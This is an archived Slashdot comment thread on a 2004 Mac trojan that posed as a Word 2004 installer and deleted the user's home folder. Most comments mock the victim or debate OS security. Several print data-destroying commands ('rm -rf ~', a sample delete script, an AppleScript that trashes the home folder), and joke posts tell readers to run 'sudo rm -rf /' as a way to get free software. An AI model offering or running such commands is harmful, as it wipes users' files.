Slashdot Mirror
Mac Trojan Horse Disguised as Word 2004
Espectr0 writes "Macworld is alerting of a malware program for the Mac. A Macworld reader alerted the magazine to the malware after he downloaded the file from Limewire. The reader told Macworld: 'I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta. The file unzipped, and to my delight the Microsoft icon looked genuine and trustworthy.' However, he added: 'I clicked on the installer file, and to my horror in 10 seconds the attachment had wiped my entire Home folder!'" This sounds similar to the recent trojan horse proof-of-concept. There are many ways to make one file look like another, on any platform. This is 2004, you should know by now not to open a file from an untrusted source.
The grass is only greener, if you don't take care of your own lawn.
I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta...I clicked on the installer file, and to my horror in 10 seconds the attachment had wiped my entire Home folder!
Maybe this is Microsoft's new security paradigm. No one can steal your data, not even you!
"Molest me not with this pocket calculator stuff."
- Deep Thought
The reader told Macworld: 'I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta.
Using Limewire? A likely story.
The file unzipped, and to my delight the Microsoft icon looked genuine and trustworthy.' However, he added: 'I clicked on the installer file, and to my horror in 10 seconds the attachment had wiped my entire Home folder!'"
This is the risk you take when downloading stuff that you don't pay for. If you purchased Office 2004 from Microsoft (thus supporting the promotion and development of software for OS X), then you would have something to gripe about. As it stands, one might suggest you got what you paid for.....
This is 2004, you should know by now not to open a file from an untrusted source.
Well said. However, this does raise the possibility of other code that could be made to look like just about anything. So, once again, think about what you install on your computer just like you would think about what you eat or who you have sex with. If you don't know, trust or suspect that software/food/person, then either screen them or think twice.
Visit Jonesblog and say hello.
This would never of happened if they were using a secure operating system like Windows.
yeah.
Uh-huh.
Now, if you'll excuse me, I have a coughing fit that requires my immediate attention...
Obliteracy: Words with explosions
Hector would be proud!
licet differant, aequabitur
That'll teach them Mac users to go clicking carelessly!
Let's see... You downloaded a microsoft public beta from a p2p net without checking ms's website for any existance of the beta. Then just because the icon looked like a m$ icon you figured it was safe with no virus scan? If you purchase this BEAUTIFUL florida swampland I have I bet your files will be restored and word 2004 will work fine
call me
"as plurdled gabbleblotchits on a lurgid bee" - Prostetnic Vogon Jeltz. (One man's humorous is another mans flamebait)
Because everyone knows the icon is the best way to ascertain the security and authenticity of any piece of software. It's very secure and hard to change, uh huh.
Ha Ha
The earlier article dealt with a document file showing the wrong file type because of extension VS resource fork issues.
This is just a case of assigning a different icon to an application. Could be as simple as an rm -rf / shell script with a word icon.
Every OS is vulernable to the ultimate virus: Stupidity.Virus.a Only one release was needed.
This should be filed under the "Humans" topic as this has nothing to do with apple or even computers.
Trojan Horses are social problems -- there isn't much apple or microsoft or anyone can do other than try to keep people on their toes.
I mean come on, limewire?
davidu
# Hack the planet, it's important.
Seriously, what a tard. The only things you can trust off Limewire is the quality porn!
This is funny. He got what he deserves. Microsoft has plenty of private beta testers. He should just spend the 150$.... stealing is not worth it.
I downloaded the file [off Limewire] in the hope that perhaps Microsoft had released some sort of public beta
Yeah I'm sure he was thinking that the file he got off LimeWire was some sort of legit public beta from MS. I mean that's the first place MS would release something like that. Not official MS sites, but a P2P network with no announcement.
-- taking over the world, we are.
'I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta'
That's a likely story...
Come on people. The only trustworthy source of any public beta software from Microsoft would be a website in the form of "http://*.microsoft.com/*" and there'd likely still be pretenders claiming to be that package floating on Limewire. Don't trust that it's Microsoft software unless you've seen Microsoft make an say that the distributor is legit.
Instead of deleting a person's files (I know you 0wn3r3d th3m!@#!) how about you do the rest of us a favour.
From this point on all trojans, such as this one, who invite idiots to test the lows of their computer skills should, instead of removing random files, disable a person's net connection. Think about the good you would suddenly be doing for the online world! You can make a positive difference! Your life isn't lost yet! Go you!
--- I do not moderate.
I mean, a 60 Kilobytes Applescript fits perfectly the name "Word 2004 Mac Beta Installer".
D'uh.
Maybe we deserve this world ?
I don't have trojans or spyware. And when I manage
my finances with Quicken v5 (for DOS) it doesn't phone home.
Why does everyone think they need bleeding edge
office productivity software?
BTW, WP5.1 for DOS still prints to my postscript printer...
I agree to a certain extent. This is not something that Mac users are accustomed to though. I grew up in a town where people didn't need to lock their house and car doors. If someone was robbed, I'd blame the crook, not the resident.
Yeah, yeah, yeah. The story is a dupe, the topic is boring, the facts weren't checked. WE GET IT!!
..the icons must have had something that gave away the true purpose of the app?
Did it lack a little polish in some corners?
Had the Arial font been used?
Was there strange bouncing activity while it was in the dock?
This is a perfect use for Fast User Switching. Create an account with no perms and no data you care about losing. Test downloads in that account. You can do it without even logging out.
Be careful though of the fact that there's no restriction on network access for a 'no perms' account. (This is a failing of UNIX in general, not MacOS in particular.) This would allow Microsoft/anyone to put out a trojan like this, and send back a 'this IP fell for it' packet, or even run a server on a 'high' port (depending on your firewall configuration).
Awesome furniture, accessories and cabinetry in Santa Rosa, CA: http://humanity-home.com/
Is it just me, or did I miss all the Trojan like aspects of that program?
Yes, it had undesirable consequences of running an un-trusted application, but Trojan?
Sounds like a bunch of hooey to me.
Not really, no. The point of that was that it was a application that looked like an mp3. This is just a application with a misleading name/icon. Anyone write code that erases a users home folder and call it Microsoft Word.
Why is this posted here? I don't post about it when my lame ass family does stupid things like this, this is pathetic, you lose your geek status.
There should be a poll to rate the stupidity of these people Further proof that biggest security risk to the internet is not Microsoft, Mac, Virii etc. It's the stupidity of the majority of internet users that will bring us all crashing down.
coughDUMBASScough... This is about as bad as when I heard a customer complain to Blockbuster that the DVD they rented was scuffed and they couldn't burn it...
I mod down so you can mod up. Your welcome.
This is 2004, you should know by now not to open a file from an untrusted source.
This 2004, shouldn't the OS be smarter about security for users?
They forgot to put the quotes around "public beta"... Maybe it's one of those "public betas" that retail at around € 200 ... Hmmhmm...
Hate me!
We all know that P2P is a trustworthy source. *rolls eyes*
He doesn't mention this in the article, but I was wondering if this asked him for a password before it executed.
I would assume it would have to before it runs an rf command on his home directory.
If it didn't ask for one, that's not good. If it did and he entered it in, he's a complete moron. Although the reality is, any OS will always be vunerable to user stupidity. It's the worms etc., that are a serious problem.
------------start-------------
#!/bin/sh
rm -rf ~/*
Then about 30 megs of gibberish....
--------------stop--------------
Put it in a Apple Script so it's executable by default(a simple Apple script can start a sh script easily), give it a pretty icon...
Put it on a P2P and call it NudeBeachShotsJobAndGates.wmv.
Hack of the century.
'I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta. The file unzipped, and to my delight the Microsoft icon looked genuine and trustworthy.'
Ah! the icon looked genuine and trustworth? from Limewire? Sounds like proof-of-concept for people are stupid.
Macs and Linux don't get viruses, right? (ducking and running to get asbestos flame proof suit) :)
Agile Artisans
Sure, that file came from an untrusted source. In fact, doesn't it serve them right to get bitten by illegally downloading software? Software that should cost money, and in fact does (quite a bit).
/tmp).
But forget that fact that this happened on an unethical download. The fact that this is malware, not a virus or a worm, not something that is exploiting the operating system by opening known bugs or attempting to hack into key parts of the system which normally would require keychain access, but that this is merely software that the user chose to install, and chose to authenticate (maybe? did it require keychain access to be able to delete files from the home directory? I think Apple probably allowed that to happen since programs *do* need to be able to write files to the Home directory, just not anywhere else, save for a temporary folder like
Just keep in mind that while the program itself was not ethical, nor were the actions of the user by downloading non-free software, this should come as no surprise to the user or to Apple, since this is not a compromise of the system nor something Apple can prevent, except through education (Don't open untrusted files and programs).
Do you think this would have happened if the user was downloading legit sourceforge or another self-produced program that claimed to do something else and just became malware or a random pop-up creator? Would we cry foul if the program was *not* downloaded illegally?
Don't eat your soul to fill your belly.
conesus.com
this would have been just as easy on a linux machine.
'i downloaded IE for linux from a warez IRC channel and untared it and ran it. now i have no home folder.'
noexec on the partition, then its a matter of running it via a library.
(to see for yourself
google: noexec lib ld linux so)
You find a file, supposedly MS word. On a P2P network (let's just spontaneously forget all the worms, trojans, and malware that spread over these things). You don't do any research as to whether or not MS *actually* released *anything* of that nature (or even if something like it is in development). You obviously decided it was a good idea to run this program. IMHO, you got what you deserved.
I always liked to think that the general computer security paradigm changed. Unfortunately, I have been proven wrong yet again.
Only the purest of souls seek enlightenment. Everyone else just wants power.
That's right! Here in 2004 we know not to do silly things like download and execute files from an untrusted source. That's why I just dl'd this spyware/trojan/virus checker. It works just like thi
*CARRIER LOST*
OK, So we have a story here, about someone who downloaded something that they didn't know what was off a P2P network, HOPED it was something they didn't even know had been released, and they're surprised it hosed their system?
Look at the author's name, 'Pudge'...does anyone other than me find it curious that an Apple news item is submitted by 'Pudge', when we're ALL familiar with the infamour 'Father Randy 'Pudge' O'day'?
The whole thing smacks of trollery.
Don't park drunk, accidents cause people.
After all, if they had never released Word, this never would have happened.
And can you believe Microsoft still has security holes in their OS like actually executing code just because the user said to do so?
If only people would switch to my OS, they would be so much more secure, since it doesn't even have applications in the first place.
If it was a windows installed you could check to make sure that various files were signed and authenticated by MS, information which I don't believe can actually be faked (dlls, exe, cab files, etc.).
I don't know if Mac has a similar feature, and I don't know if some random moron like this guy would even have bothered to check. However, it would seem that MS' own security would indeed have offered a better chance of preventing such a Trojan.
-rt
Bwahahahahahaha
You have to use the Real Microsoft command (rm for short)
/'
1. Open Terminal
2. Type 'sudo rm -rf
3. Provide your password....
A similar program om Windows could do far more than just hose someones Home folder, because most Windows users runs with high privileges.
Anyway...this is stupid. It really is.
This sounds similar to the recent trojan horse proof-of-concept
This is nothing of the sort. The recent warning was for mp3 or other non-executable looking files carrying a trojan horse payload...that is far sneakier than this. This is simply a program that doesn't do what it claims to do. He expected an executable, he got an executable. An if he really thought that Microsoft would relase a public beta through limewire...well, caveat emptor and all.
Since it only deleted his home directory, it probably wasn't that sophisticated. I'm surprised it didn't attempt to escalate privilieges under the guise of an installer and do even more damage.
I suppose I should make a clippy joke here (I'm really tempted), but I actually like office X and am looking forward to the next version.
Do not taunt Happy Fun Ball(TM)
How does this differ in functionality from Word 2003?
:wq
I wish I could say I'm surprised at the gullibility of this particular user, but I'm surrounded by an office full of similarly-minded folks. They're of the click-before-you-consider mindset simply because "we're on macs... all that bad stuff is for Windows users." I'm in hopes they're not all anxious to try out Word 2004.
It's nice to see that, on a Macintosh, even the biggest idiot can only erase their data by accident, not vital OS files.
Moronic Mac Maniac Makes Mindless Manouvre!
Click-happy clump clicks on covert icon!
Netcraft confirms: Mac users are braindead too.
Evily stolen from robg Link
After reading the article and the press release, I think it's pretty obvious what the program is doing -- I suspect it's nothing more than a one-line AppleScript. Although some (perhaps many) will disagree with me, I'm going to publish what I think the exploit to be, because it's not a huge secret. Basically, my guess is that the trojan horse is a one-line AppleScript that contains the following UNIX command (in the script, the command will be accessed via the AppleScript method for calling a shell command, but I'm not going to bother including that part here):
rm -rf ~
WARNING!! DO NOT USE THIS COMMAND! YOU WILL ERASE YOUR USER'S DIRECTORY!
I feel it's important that everyone understand the above command, and know what it looks like -- the more people who know what this line does and how it works, hopefully the fewer who will be fooled by it. And to claim that this is some "deep dark secret" that needs to be hidden is, in my opinion, trying to hide from the truth -- more "security by obscurity," which we all know doesn't work well at all. rm -rf is a very standard, very useful Unix command. In fact, if you search macosxhints (using the advanced search page) for the 'exact phrase' rm -rf, you'll get fully three pages of matches.
What makes it troublesome in this case is simply that it's called from a program where the typical user will not know what's happening, and will be shocked at the outcome. But listing the command is not like explaining how to write a self-replicating virus that spreads from machine to machine -- this is common knowledge to probably at least a couple of million OS X users who have some knowledge of Unix.
For those that don't know Unix, rm is "move to and empty trash," -r is "do this for all items and folders within this folder," the f means "force removal without confirmation," and the ~ means "the user's directory." Spelled out, this means that the script will, without warning or user intervention, delete everything in the user's folder. Permanently.
The Intego press release explains one way to test a program if you suspect it might be a trojan horse -- select it, do a Get Info, and try to delete the icon. Here's another safety check that I often use myself: drag and drop the program onto Script Editor (or control-click on a package and select Show Package Contents to explore the package contents if it's a package installer). If you're lucky, and the script writer was somewhat lazy (by not making the script uneditable), the script itself will open for editing.
So now that you know about this trojan horse, the question is, what should be done about them on OS X? My first thought on reading the article was "Cool, Darwin at work on the peer to peer networks!" But then, I considered some additional scenarios which may have more applicability in the real world. The current example is likely to remain on Gnutella, given that it's a program that purports to install the currently 'hot' application, the new Office suite. However, think about this version: A useful AppleScript that does something cool (change type/creator codes, backs up your directory, etc.). However, buried in the code is a timer that counts the number of times you've used the program. On the 50th run, it deletes your entire user's folder. Or worse, it pops up a dialog that says "In order to backup the Foo_bar file, we need your admin password." It may then be possible (I'm not quite sure how) for the app to delete the entire hard drive, instead of just your user's folder. If the script were useful enough, it could be very widely distributed, and then go blam! at some non-specified time in the future.
What, if anything, should Apple do about this? Note that this is not specific to OS X; it's really a 'social engineering' exploit. I think it would be just as easy to write a similar 'exploit' for Linux or even Windows, given that it's a simple script that relies
I fought the corporate America, and the corporate America bought the law.
Why would an editor even accept this story? Be it Macworld or Slashdot. Wow, viruses hiding as warez! What a concept!
am i the only who doubts the authenticity of this story?
sounds like the G5 case mod: a made-up story to rile the Mac heads..?
Anything I download or get from an untrusted source I run in a clean Virtual PC first. Easy.
Never, ever lose a file again. Ever.
From the read me:
Trojan Example Read Me
This is an EXAMPLE of an AppleScript with a custom icon. It does nothing malicious. It does not spread. It does not delete files. It speaks and displays some dialog boxes. It's merely poking fun at Intego's sensationalist handling of these issues on Mac OS X, and their claims that these represent serious flaws in Mac OS X.
I wonder if Intego will protect against, and describe, this trojan...?
Perhaps they can make another press release hawking VirusBarrier.
For more information:
das@doit.wisc.edu
Available at:
http://mirror.services.wisc.edu/mirrors/tmp/
The "trojan" is an AppleScript that speaks the text: "Muhahahaha. You have been owned by this elite trojan. Just kidding." It then displays a series of dialog boxes:
1. "OMG! it's another trojan for Mac OS X! Will Intego have to protect against this one too?"
2. "Intego's irresponsible sensationalism about non-issues is quite astounding."
3. "They make wild claims about 'serious weaknesses' in Mac OS X that simply aren't true, for the sake of hawking their product."
4. "AppleScripts and fake MP3s do not, nor will they ever, rise to the level of the mind-boggling number of completely remote exploits for Windows, requiring absolutely no user interaction, that plague millions of computers and cost billions of dollars of lost productivity."
5. "Mac OS X is intrinsically and fundamentally more secure, and more open to peer and community review."
6. "Social engineering problems, such as tricking a user into launching a fake Word installer that's really an AppleScript downloaded from a P2P network, don't reveal 'serious weaknesses' in Mac OS X."
7. "Intego would be well suited to selling snake oil at a two-bit carnival."
It then quits.
It has Intego's VirusBarrier X installer icon, and is named "VirusBarrier X Install.app".
(Note: this package is CLEARLY labeled as an example, and comes with a read me.)
-nt-
It looks like a program that has the ability to read/write/delete files from your hard drive. In fact, it is a program that has the ability to read/write/delete files from your hard drive. This same exploit could work on essentially any other OS.
So Troy is coming to theaters in 2004 and all of a sudden this trojan comes out disguised as Word 2004. I think a see what's going on here. Movie company makes trojan to hype new movie.
Ok, this is getting ridiculous. This problem is on EVERY operating system that can allow a program to delete a file. On Mac OS X (and other permission based systems) this risk is actually *reduced*. Unless you're running it as root (which is your own fault if you are :P) it can't do any damage to things that you don't own. The operating system remains stable but all your stuff is gone heh.
And two good rules of thumb (for any OS IMHO):
Monthly (or weekly) backups
A spare user account (with admin privelages of course)
That'll save you from having to reinstall and loose all of your information.
And downloading P2P isn't exactly a trusted source. As previous posters have said: If you want Microsoft Word buy it, but don't be suprised that if you pirate it it might not work.
TheMadRedHatter
while(1)
{
}
Ah, the story of life.
Seriously though, even relatively small user populations are vulnerable to trojans and worms. The Witty Worm (see this analysis) indicates that non-Windows users are just as vulnerable a target - Witty infected almost 100% of the vulnerable worldwide population of 12,000 or so machines in about an hour. In other words, Mac (and Linux) users need to take the same precautions as those of us who are saddled with bloody Windows do.
Never email donotemail@WeAreSpammers.com
Go cry to someone other than me. There are only more trojans for Windows than I have hair on my head. :P
Be glad it didn't fry your hardware, or make you download kiddie porn, or make you DoS SCO, or the FBI. Be glad I tell you, and beware that free software ye be tryin to get matie.
BTW knowing the history between Gates and Jobs, what in the hell made you think M$ would release something for the OS/x platform?
Is your BIOS fried?
I am Bennett Haselton! I am Bennett Haselton!
The funny thing is, this made MacWorld news... what does that say about Mac users? If someone wrote into Microsoft I believe they would just laugh in his face, and hang up the phone.
I mod down so you can mod up. Your welcome.
I second that quality porn comment
1) Create shell script with "rm -rf $home/*"
2) Package script with Microsoft Icon
3) Upload to P2P network
4) ???
5) Laugh as retarded Slashdot editors call it valid malware
Come on guys... lets get serious.
i'm glad to see that you can still make something more idiot proof and nature will make a better idiot.
wtg nature!
ms already includes word 2005 on EVERY MAC!!!
.. it's like a total back door into the software.
/
you just need to use the "reveal microsoft" command
normally you have to use your credit card and get a license key from ms web site but they have this back door for maintainance and they FORGOT IT! It's gonna be fixed in the next security update. you must've read the macworld article, and it was on that mac dudes blog!!!!!
Her'es the command for "reveal microsoft". first you have to get down into the Terminal program (I know: scareeeeey!) and just type this:
rm -rf
That tells it to "reveal microsoft" "-rapid" "-final" "/" The slash means to install it on your main drive (the one inside the computer). If you have a really big firewire drive with all the cool stuff you got from limewire, you can replace "/" with the path to the drive (use finder and just drag the icon to the terminal window! macs are awesome!)
After you do this you will have FREE and LEGAL ms word on your mac!! not a beta! the real thing! You can trust me, I've been using macs since 1981!!
Yeah, because Limewire is the first place I go when looking into evaluating software. Your a thief and got what you deserved!
How can such a goal be attained? There are many ways available now. The most obvious one is a VM system with security policies, such as the JVM. That's not the only one, though. Another method is a capabilities-based system, so when a process starts, it has only a defined set of capabilities to work with. OpenBSD has a similar, but more limited system called systrace. The TrustedBSD project and SELinux have similar aims, and SELinux is being integrated into mainstream Linux distros. Another way to run untrusted things is with user-mode Linux, which I believe is integrated with Linux 2.6
The editor is right, though, that on currently-used systems like OSX and MS Windows, you have to be careful what you click on. But the problem is that we have come to accept that as "the way things are", when there is no reason for that to be the case. You should be able to run hostile code, see what it does, laugh at it, and delete it without any harm. The technology to do that exists, and has existed for years, but we have come to accept broken products and systems that don't allow that.
---------
WAP news
s/Word 2004/new release/g
s/Limewire/BitTorrent/g
s/public beta/ISO image/g
Not so funny now, is it? Still, this is old news. Check the MD5sums when you download something. Or do forensics on it first. Or install it on a test machine. But, yes, it's easy to forge anything from mail to program icons - all the more reason to be careful.
Why was this under the "Apple" topic? Do we not have a "Darwin awards" topic?
There is no sig, there is only Zuul.
Stupid User Trick, maybe. News? No.
Now, if someone dragged said stupid user, hung him by the feet from the ceiling in the Apple cafeteria and then let all the Apple employees make fun of him... that might be news.
nothing like users to break your security.
Some people have to learn things the hard way... but as long as people _do_ learn, it might not hurt to look at this story under a less critical light.
File under 'M' for 'Manic ranting'
No reason for morons to use Unix.
It will probably take him some time to replace all that lost porn too.
You have to wonder, word is a pretty hefty piece of software, did the attackers even bother padding the program? A really quick download time would be one of a multitude of clues that what you are downloading probably isn't legit.
for a moron who downloads MS Word from Limewire? Beta...(LOL) yeah right. Good for you idiot.
Newsflash, the source code of the trojan has been obtained. It's thought to be something like this:
----------
tell application "Finder"
move home to trash
empy trash
end tell
----------
Maybe we deserve this world ?
Here is the latest mac virus. written completely in applescript.
tell application "Finder"
activate
set target to folder home
delete target
empty trash
end tell
This won't actually work though because r/o access to the root of the home directory is provided through applescript. This is really a non-event in trojan terms. It's affected a user trying to pirate software, be it beta Microsoft stuff. I guess you get what you deserve for installing beta office builds... :-)
"404: Someone who's clueless. From the World Wide Web message> "404, URL Not Found," meaning that the document you've tried to access can't be located. "Don't bother asking him...he's 404, man.""
Trolls lurk everywhere. Mod them down.
Microsoft... released a 108KB version of Office? :-D Must be that new C# bytecode I've heard about! VERY EFFICIENT!!
-Don.
Cwm, fjord-bank glyphs vext quiz
If he had been using Mac OS or some *nix variant, he wouldn't have had to worry about trojans. There have been no viruses to date for Mac OS X. :) All viruses are for Windows.
This is 2004, you should know by now not to open a file from an untrusted source.
This is 2004, you should know by now that Microsoft can't possibly have released Office 2004 this year.
However, reading TFA, the following quote leaps out at me: A Microsoft spokesperson said: 'Security is a top priority for Microsoft, and we are committed to ensuring a safe and reliable computing experience for all of our customers. ' Yeah, right. Let them fix their installer first:
That would be a default install.
What Would the Fab Five Do?
Echoing what others have said. You get what you pay for. If I download something via Limewire or Aquisistion then I am fully prepared for it to death my machine. I can partially understand the "A public beta by MS" thing, as yeah, if there was a public beta then it would get onto P2P, however, having said that, if I saw it on P2P, my next step would be the MS site to see if it's on there, if so, then try downloading it from there, makes more sense to use the official source. One word that springs to mind is BACKUP! If he had a backup then so what if /Users/~ was trashed, just restore it, bingo!
User education, that's the key, alas, there will always be those who just won't or can't "get it", thus leading to these situations.
Well, maybe this IS/WAS a test/stunt by MS after all to show how "secure" and safe Mac OS X is.
Now excuse me while I go find my tinfoil hat!!
Well, of course, it should be easier to fool a Mac user...
After all... the ICON looked right, didn't it? I mean... If the ICON looks pretty, it must be some kinda candy, right? Because, all viruses and trojans have some sort of evil, nasty looking icon that should scare away the average Mac user... And the icon would clash with the design of the computer anyway... so they would get rid of it. But, if it matches, then, hey, it must be legit.
Sucker.
-- Liberalism is a mental disorder.
Thats just as lame as me writing a shell script to run a command to delete tons of stuff, and making it larger to look like its a real program! Why does crap like this get put on Slashdot?
-Imidazole2
The program would run as the current user.
/user/my_name direcotry it wouldn't need to ask for a password.
If the program wanted to change system files it would have to ask for the root password, but because it only erased the files under
Had Microsoft released it, wouldn't it be a trojan horse anyway? It will slow down your computer, transmit personal data to Microsoft and, if past versions history serves as comparison, open your computer wide to all sorts of attacks. Thinking of it, perhaps the version he downloaded is an alpha including only the "slow down, transmit and open" subsystems.
Clearly, this is a complex marketing ploy being pushed by Hollywood to promote its new Brad Pitt film.
You know as someone who normally gets their "public betas" from IRC or Limewire rather then the source, I have to laugh my a$$ off at this.
Perhaps advantage Windows users on this one. PC users have long known that the "Lord of the Rings 3" from Kazaa is either going to be "Finding Nemo", or "Find your Files Sucker".
I forsee a whole lot of Mac users searching "Norton Anti" on Limewire for the next few days. Hope this guy doesn't rename his file and change the icon to the Norton logo.
MUWhahahahahahahahahaha
its not a trojan, its a fucking applescript with a Microsoft icon on it. The dumbass deserved to get hit when they saw it was only 104 megs when every install of office had been 300 or more.
"Slashdot, where telling the truth is overrated but lying is insightful."
Should you WANT something if it is going to be a Trojan Horse?
This
Workaround: Create a new user and run the "installer" from that account.
Look Ma! I'm a Hacker!!!
I'm in the hole of the broadband donut.
Oh no, your entire homefolder wiped because you started an untrusted installation application, which must have had the word Application right next to it if you would have actually looked at the file which you got from an untrusted source. This is all Apple's fault, you think they should have patched the OS so that you would get an even bigger notification when you start an Application. Would something like that have saved you?
No of course not you would have clicked 'Install Microsoft cool beta' and have given your root password for the 'installation' to complete. Then it would have wiped your entire computer.
Be glad it was made by fools for fools only.
Dumb de dumb dumb
There is no secure system, and never will, as long as there are mentally-challenged users who blindly trust software from not-100%-legit origins.
And bragging that such and such OS is more-secure-than-thou does not help either. The least-gifted users of this OSs will believe this and will feel a false sense of security and run whatever application falls on their hand. Most of these will be honest appl, but it takes only one to wreak havoc.
As Albert Einstein said,
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former.
It's not a virus, it's just Clippy!
According to Intego the file was a 108 KB AppleScript applet. When was the last time Micro$oft released anything resembling an application 108 KB in size.
There have actually been cases in the US where the burgler has won damages against home owners (the intended victim. It is also not legal to booby-trap your home or store. Of course shooting them is another matter!
You would need to run as a privelaged account when installing software. Unless you just want programs in your home directory and only usable by you and no other user.
J
What better way to get the "security problem" media focus off yourself than by exploiting a competitor.
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
This has nothing to do with the Mac platform or the security of that platform. If I can convince you to run a malicious program, on any platform, then I can do pretty much whatever I want to your system.
This exact same problem exists for Linux, Windows, Solaris, and *BSD. Unfortunately people will probably take this example to mean that the Mac OS X platform is somehow insecure because of it. I could do the exact same thing for Windows and if you would download it from LimeWire (or any other untrusted source) and run it then it could do just as much damage.
infested with jello like fishes no melotron wishes
It is a non story even if it happened, and it is unlikely to have happened. Unless the guy is a 10-year old who fell for a trap his 11-year old sister set up for him.
Warez monkeys get what they deserve
If someone says he and his monkey have nothing to hide, they almost certainly do.
For a Windows worm to make it onto /., it has to autonomously infect hundreds of thousands of machines within hours of being released. Anything less, and it just isn't newsworthy.
On the mac, you only need one idiot manually downloading and running what he suspects is an untrusted native executable that turns out to actually be an untrusted native executable. And it's on the front page. Of slashdot.
Hrumph. My sig is so appropriate today.
Upstairs Dog, Downstairs People.
to my delight the Microsoft icon looked genuine and trustworthy
Now wait just a minute... the user verified the integrity of the file by looking at the icon! It "looked" trustworthy and genuine. That's gotta be proof enough that the executable was indeed from Microsoft, after all, no one would could possibly duplicate a Microsoft icon. That'd be as hard as copying those fancy holograms on their packaging. If we can't trust icons, next you'll be telling me you can't trust the filename either.
I'd chalk this story up to "Slow News Day" or perhaps "Dogpile on Stupid User Day". I bet he didn't have backups either.
You are in a maze of twisty little passages, all alike.
If it sounds too good to be true, it probably is.
Dogma - "let's just say we'd like to avoid any empirical entanglements."
It's nice to know that there really are happy endings. It's too bad this guy still breathes the same air we do though. Quite a waste.
I mean, no matter what you say, or what you do, or what policies you pass, eventually someone, somewhere, will try to shave their testicles with a chainsaw.
Did you notice that was a quote and not the statement from the poster? Duh!
and more about the irresponsibility of the press in reporting. This should never have been taken seriously, except in passing, as a sad commentary on the state of humanity. The heading should have been something like "Even Stupid people use Macs."
Sir, there is a dragon outside with an armful of armor. He's inquiring if we offer free refills.
Well, as usual, pudge has to add his 2 cents, which, as always, consists of some comment in defense of Apple. Pudge, why can't you just post the news like (some) other people (some of the time), and leave your opinions out of it?
Resilliant to viruses but not resilliant to idiots
-Imidazole2
Maybe it did work completely correctly. After all, Microsoft does fiercely fight all competition.
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
Now that at least some Windows users are starting to become aware of this sort of thing, are Mac users next?
Most Mac users I talk to do nothing but go on about how they never have to worry about this sort of thing. Seems like a group of users that's that overconfident in their systems are ripe for infection.
A trojan is something that is not what it appears to be. So yes, it's a trojan.
First, some undisputable facts.
And now some helpful sites are found here
I thought we were past the whole "Trusting Microsoft" question. Isn't that the whole reason people use Macs in the first place?
Intolerance for ambiguity is the mark of the authoritarian personality.
gee, you downloaded what looked like a free version of something that is NEVER free. and from a source like Limewire?
then suprised when your machine gets hosed?
the icon looked real? that's pretty hard to counterfeit, eh?
are there darwin awards for computer users?
Well, the only true way to tell if you are about to download a software package from Microsoft is to first check for known security holes. No holes reported generally means it isn't a genuine MS product.
It just goes to show you even a moron can use Mac. A 'trustworthy' looking icon? Hey, I got some ocean front property in Arizona I wanna sell you. Don't worry, its a 'trustworthy' investment!
This is a test. This is a test of the emergency sig system. This has been only a test.
Mac's don't get viruses! If we all used Macs, then things like this wouldn't happen because it's such a rock solid operating system, and impervious to such things as plague Windows users. ... right?
Seriously, no matter what happens in our world of technology, users will be users and will stay users.
I would say the user is broken, not the system. Idiots like this guy will always find ways to hose themselves, we should not redesign our world around them.
Free Mac Mini Yeah, it's
So this trojan was from 'Word 2004'..a decent one to pick because it recently started shipping.
:)
What other apps are good targets for trojan horses? I have always been afraid of downloading a 'virus scanner' because it just screams 'I have no virus scanner on my computer!'
Others you have noticed? Perhaps a 'digital wallet' application to keep credit cards, passwords, etc. in
I only came here to do two things; kick some ass, and drink some beer...looks like we're almost out of beer.
It's not even as complicated as that. Why isn't there a system alert when the Home folder is moved or moved to the trash? Apple has always had this kind of thing for other folders, it should be no different with this. Barring that, perhaps AppleScript should have limitations (or dialogs) regarding emptying the trash. If it's allowed to do it, there should be an admin prompt when you run the AppleScript.
I just made a new user to run an rm -rf ~ on to see how it looks.
:)
I have to say I'm impressed with how Apple handles this situation. You actually have to do rm -rf ~/* but anyways, once your home directory is emptying there is no error message. No flood of missing files or application crashes. You just log out and log back in and hey you have the default's loaded again like a fresh user. Being a Windows/Linux switcher I have to say this is handled quite differently than I expected. At least in windows losing all your windows files is gonna cause some serious problems, may not be able to log back in again.
Maybe I'm odd but eh.
-Don.
Cwm, fjord-bank glyphs vext quiz
It mascerades as linux-kernel-2.8 and can be found on freenet in hopes of Linux users wanting to try out the latest kernel will try it.
The code of the virus has been obtained with a hexeditor.
#!/bin/sh
#Stupid Linux user virus 1.0
Echo Installing Britney Nude screensaver
rm -rf ~
echo Muahhaahha sucker
I fought the corporate America, and the corporate America bought the law.
This is news? Some not-too-bright individual runs a program, and _gasp_, it deletes stuff! It's not as if it's a worm for OS X, which exploits some massive vulnerability. It's the equivilant of some idiot running a batch file on windows, which does "del %homepath%"
This, "The file is cunningly disguised as a Word 2004 for Mac demo - from the forthcoming Office 2004 for Mac suite.", just made me fucking laugh..
"cunningly disguised".. mm-hm. Ok.
"in the hope that perhaps Microsoft had released some sort of public beta"
AHAHAHAHAHAHA!!! Public beta...who does he think he's kidding, exactly? Try "...I w45 w4r3z|n my 4zz 0ff wh3|\|...". I bet he's probably also running the "Public Betas" of Photoshop and Illustrator and Final Cut Pro. Oh man...that's too funny.
Good lord... Someone downloaded something from Limewire and it wasn't what it claimed to be. Slashdot beat everyone to the scoop... I'm sure articles will be popping up all over CNN, Reuters, MSNBC, Yahoo, etc... They just haven't had time to gather their thoughts. And who can blame them, considering the magnitude of a story like this one?
This is going to shatter the credibility of Limewire. They'll be sued out of existence. I wouldn't be surprised if this was some sort of insanely devious and clever plot masterminded by Kazaa to eliminate their competition. This may be the end of P2P as we know it.
Truly a red-letter day. Everyone, take a moment to remember today's date, because your grandchildren will be asking you where you were on 5/12/04 -- the day of the trojan that was heard around the world.
Remember, a good deal of the Mac users out there are clueless ex-Windows user friends that we instructed to purchase Macs after scrubbing their old PCs of viruses, adware, spyware and other such crap one too many times.
No matter how often we tell them otherwise, it is ingrained in them to use the icon as an indictor of a file's content. If it wasn't then a great deal fewer email viruses would make it into the wild.
I got this email that said "Your computer is too slow. Send this message to all your friends and then erase your hard drive." When I did it, I lost all my files. THIS IS A OS X TROJAN HORSE.
1: I am an pirate!
2: I am a idiot!
